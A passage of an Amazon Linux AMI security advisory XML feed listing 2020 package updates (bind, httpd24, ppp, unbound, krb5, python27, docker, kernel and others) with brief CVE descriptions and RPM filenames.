arch="i686"><filename>Packages/php73-imap-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.17" release="1.25.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-dba-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.17-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1369</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1369: important priority package update for bind</title><issued date="2020-05-22 20:57:00" /><updated date="2020-06-03 17:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8617:
Using a specially-crafted message, an attacker may potentially cause a BIND server to reach an inconsistent state if the attacker knows (or successfully guesses) the name of a TSIG key used by the server. Since BIND, by default, configures a local session key even on servers whose configuration does not otherwise make use of it, almost all current BIND servers are vulnerable. In releases of BIND dating from March 2018 and after, an assertion check in tsig.c detects this inconsistent state and deliberately exits. Prior to the introduction of the check the server would continue operating in an inconsistent state, with potentially harmful results.
An assertion failure was found in BIND, which checks the validity of messages containing TSIG resource records. This flaw allows an attacker that knows or successfully guesses the name of the TSIG key used by the server to use a specially-crafted message, potentially causing a BIND server to reach an inconsistent state or cause a denial of service. A majority of BIND servers have an internally-generated TSIG session key whose name is trivially guessable, and that key exposes the vulnerability unless specifically disabled.
1836124: CVE-2020-8617 bind: A logic error in code which checks TSIG validity can be used to trigger an assertion failure in tsig.c
CVE-2020-8616:
A malicious actor who intentionally exploits this lack of effective limitation on the number of fetches performed when processing referrals can, through the use of specially crafted referrals, cause a recursing server to issue a very large number of fetches in an attempt to process the referral. This has at least two potential effects: the performance of the recursing server can potentially be degraded by the additional work required to perform these fetches, and the attacker can exploit this behavior to use the recursing server as a reflector in a reflection attack with a high amplification factor.
A flaw was found in BIND, where it does not sufficiently limit the number of fetches that can be performed while processing a referral response. This flaw allows an attacker to cause a denial of service attack. The attacker can also exploit this behavior to use the recursing server as a reflector in a reflection attack with a high amplification factor.
1836118: CVE-2020-8616 bind: BIND does not sufficiently limit the number of fetches performed when processing referrals
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8616" title="" id="CVE-2020-8616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8617" title="" id="CVE-2020-8617" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-chroot" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" 
release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1370</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1370: low priority package update for httpd24</title><issued date="2020-05-22 20:57:00" /><updated date="2020-06-03 17:18:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1934:
In Apache HTTP Server 2.4.0 to 2.4.41, mod_proxy_ftp may use uninitialized memory when proxying to a malicious FTP server.
1820772: CVE-2020-1934 httpd: mod_proxy_ftp use of uninitialized value
CVE-2020-1927:
In Apache HTTP Server 2.4.0 to 2.4.41, redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL.
1820761: CVE-2020-1927 httpd: mod_rewrite configurations vulnerable to open redirect
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1927" title="" id="CVE-2020-1927" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1934" title="" id="CVE-2020-1934" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_proxy_html" version="2.4.43" release="1.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.43" release="1.89.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.43" release="1.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.43" release="1.89.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.43" release="1.89.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.43" release="1.89.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.43" release="1.89.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.43" release="1.89.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.43" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.43-1.89.amzn1.noarch.rpm</filename></package><package name="mod24_ldap" version="2.4.43" release="1.89.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mod24_ldap-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.43" release="1.89.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.43" release="1.89.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.43-1.89.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1371</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1371: important priority package update for ppp</title><issued date="2020-05-22 20:57:00" /><updated date="2020-06-03 17:20:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8597:
eap.c in pppd in ppp 2.4.2 through 2.4.8 has an rhostname buffer overflow in the eap_request and eap_response functions.
1800727: CVE-2020-8597 ppp: Buffer overflow in the eap_request and eap_response functions in eap.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8597" title="" id="CVE-2020-8597" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ppp" version="2.4.5" release="11.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ppp-2.4.5-11.9.amzn1.x86_64.rpm</filename></package><package name="ppp-devel" version="2.4.5" release="11.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ppp-devel-2.4.5-11.9.amzn1.x86_64.rpm</filename></package><package name="ppp-debuginfo" version="2.4.5" release="11.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ppp-debuginfo-2.4.5-11.9.amzn1.x86_64.rpm</filename></package><package name="ppp-debuginfo" version="2.4.5" release="11.9.amzn1" epoch="0" arch="i686"><filename>Packages/ppp-debuginfo-2.4.5-11.9.amzn1.i686.rpm</filename></package><package name="ppp" version="2.4.5" release="11.9.amzn1" epoch="0" arch="i686"><filename>Packages/ppp-2.4.5-11.9.amzn1.i686.rpm</filename></package><package name="ppp-devel" version="2.4.5" release="11.9.amzn1" epoch="0" arch="i686"><filename>Packages/ppp-devel-2.4.5-11.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1372</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1372: important priority package update for python-twisted-web</title><issued date="2020-05-22 20:57:00" /><updated date="2020-06-03 17:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10108:
In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with two content-length headers, it ignored the first header. When the second content-length value was set to zero, the request body was interpreted as a pipelined request.
1813439: CVE-2020-10108 python-twisted: HTTP request smuggling when presented with two Content-Length headers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10108" title="" id="CVE-2020-10108" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-twisted-web" version="8.2.0" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-twisted-web-8.2.0-6.6.amzn1.x86_64.rpm</filename></package><package name="python27-twisted-web" version="8.2.0" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-twisted-web-8.2.0-6.6.amzn1.x86_64.rpm</filename></package><package name="python27-twisted-web" version="8.2.0" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/python27-twisted-web-8.2.0-6.6.amzn1.i686.rpm</filename></package><package name="python26-twisted-web" version="8.2.0" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/python26-twisted-web-8.2.0-6.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1373</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1373: important priority package update for unbound</title><issued date="2020-05-22 20:58:00" /><updated date="2020-06-03 17:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12663:
Unbound before 1.10.1 has an infinite loop via malformed DNS answers received from upstream servers.
No description is available for this CVE.
99999:
CVE-2020-12663 unbound: infinite loop via malformed DNS answers received from upstream servers
1837604: CVE-2020-12663 unbound: infinite loop via malformed DNS answers received from upstream servers
CVE-2020-12662:
Unbound before 1.10.1 has Insufficient Control of Network Message Volume, aka an "NXNSAttack" issue. This is triggered by random subdomains in the NSDNAME in NS records.
No description is available for this CVE.
99999:
CVE-2020-12662 unbound: insufficient control of network message volume leads to DoS
1837597: CVE-2020-12662 unbound: amplification of an incoming query into a large number of queries directed to a target
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12662" title="" id="CVE-2020-12662" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12663" title="" id="CVE-2020-12663" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="unbound-devel" version="1.6.6" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-devel-1.6.6-1.5.amzn1.x86_64.rpm</filename></package><package name="unbound-debuginfo" version="1.6.6" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-debuginfo-1.6.6-1.5.amzn1.x86_64.rpm</filename></package><package name="unbound-libs" version="1.6.6" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-libs-1.6.6-1.5.amzn1.x86_64.rpm</filename></package><package name="unbound-python" version="1.6.6" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-python-1.6.6-1.5.amzn1.x86_64.rpm</filename></package><package name="unbound" version="1.6.6" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-1.6.6-1.5.amzn1.x86_64.rpm</filename></package><package name="unbound" version="1.6.6" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-1.6.6-1.5.amzn1.i686.rpm</filename></package><package name="unbound-libs" version="1.6.6" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-libs-1.6.6-1.5.amzn1.i686.rpm</filename></package><package name="unbound-debuginfo" version="1.6.6" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-debuginfo-1.6.6-1.5.amzn1.i686.rpm</filename></package><package name="unbound-devel" version="1.6.6" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-devel-1.6.6-1.5.amzn1.i686.rpm</filename></package><package name="unbound-python" version="1.6.6" release="1.5.amzn1" epoch="0" 
arch="i686"><filename>Packages/unbound-python-1.6.6-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1374</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1374: medium priority package update for krb5</title><issued date="2020-05-22 20:58:00" /><updated date="2020-06-03 17:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-20217:
A Reachable Assertion issue was discovered in the KDC in MIT Kerberos 5 (aka krb5) before 1.17. If an attacker can obtain a krbtgt ticket using an older encryption type (single-DES, triple-DES, or RC4), the attacker can crash the KDC by making an S4U2Self request.
1665296: CVE-2018-20217 krb5: Reachable assertion in the KDC using S4U2Self requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20217" title="" id="CVE-2018-20217" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-workstation" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="libkadm5" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.15.1-46.48.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.15.1-46.48.amzn1.i686.rpm</filename></package><package 
name="libkadm5" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.15.1-46.48.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.15.1-46.48.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.15.1-46.48.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.15.1-46.48.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.15.1-46.48.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.15.1-46.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1375</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1375: medium priority package update for python27</title><issued date="2020-05-22 20:58:00" /><updated date="2020-08-31 21:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18348:
An issue was discovered in urllib2 in Python 2.x through 2.7.17 and urllib in Python 3.x through 3.8.0. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the host component of a URL) followed by an HTTP header. This is similar to the CVE-2019-9740 query string issue and the CVE-2019-9947 path string issue. (This is not exploitable when glibc has CVE-2016-10739 fixed.)
1727276: CVE-2019-18348 python: CRLF injection via the host part of the url passed to urlopen()
CVE-2018-20852:
http.cookiejar.DefaultPolicy.domain_return_ok in Lib/http/cookiejar.py in Python before 3.7.3 does not correctly validate the domain: it can be tricked into sending existing cookies to the wrong server. An attacker may abuse this flaw by using a server with a hostname that has another valid hostname as a suffix (e.g., pythonicexample.com to steal cookies for example.com). When a program uses http.cookiejar.DefaultPolicy and tries to do an HTTP connection to an attacker-controlled server, existing cookies can be leaked to the attacker. This affects 2.x through 2.7.16, 3.x before 3.4.10, 3.5.x before 3.5.7, 3.6.x before 3.6.9, and 3.7.x before 3.7.3.
1740347: CVE-2018-20852 python: Cookie domain check returns incorrect results
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20852" title="" id="CVE-2018-20852" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18348" title="" id="CVE-2019-18348" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-devel" version="2.7.18" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-1.137.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-1.137.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-1.137.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-1.137.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-1.137.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-1.137.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-1.137.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-1.137.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.18" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-1.137.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.18" 
release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-1.137.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-1.137.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-1.137.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1376</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1376: important priority package update for docker</title><issued date="2020-05-29 21:52:00" /><updated date="2020-06-03 17:24:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-13401:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13401" title="" id="CVE-2020-13401" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="19.03.6ce" release="4.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-19.03.6ce-4.58.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="19.03.6ce" release="4.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-19.03.6ce-4.58.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1377</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1377: important priority package update for kernel</title><issued date="2020-06-01 12:24:00" /><updated date="2020-06-03 17:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1749:
A flaw was found in the Linux kernel's implementation of some networking protocols in IPsec, such as VXLAN and GENEVE tunnels over IPv6. When an encrypted tunnel is created between two hosts, the kernel isn't correctly routing tunneled data over the encrypted link; instead, it sends the data unencrypted. This would allow anyone in between the two endpoints to read the traffic unencrypted. The main threat from this vulnerability is to data confidentiality.
1809833: CVE-2020-1749 kernel: some ipv6 protocols not encrypted over ipsec tunnel.
CVE-2020-12770:
An issue was discovered in the Linux kernel through 5.6.11. sg_write lacks an sg_remove_request call in a certain failure case, aka CID-83c6f2390040.
1834845: CVE-2020-12770 kernel: sg_write function lacks an sg_remove_request call in a certain failure case
CVE-2020-10751:
A flaw was found in the Linux kernel's SELinux LSM hook implementation before version 5.7, where it incorrectly assumed that an skb would only contain a single netlink message. The hook would incorrectly only validate the first netlink message in the skb and allow or deny the rest of the messages within the skb with the granted permission without further processing.
1839634: CVE-2020-10751 kernel: SELinux netlink permission check bypass
CVE-2019-19768:
In the Linux kernel 5.4.0-rc2, there is a use-after-free (read) in the __blk_add_trace function in kernel/trace/blktrace.c (which is used to fill out a blk_io_trace structure and place it in a per-cpu sub-buffer).
1786164: CVE-2019-19768 kernel: use-after-free in __blk_add_trace in kernel/trace/blktrace.c
CVE-2019-19319:
In the Linux kernel 5.0.21, a setxattr operation, after a mount of a crafted ext4 image, can cause a slab-out-of-bounds write access because of an ext4_xattr_set_entry use-after-free in fs/ext4/xattr.c when a large old_size value is used in a memset call.
1784130: CVE-2019-19319 kernel: out-of-bounds write in ext4_xattr_set_entry in fs/ext4/xattr.c
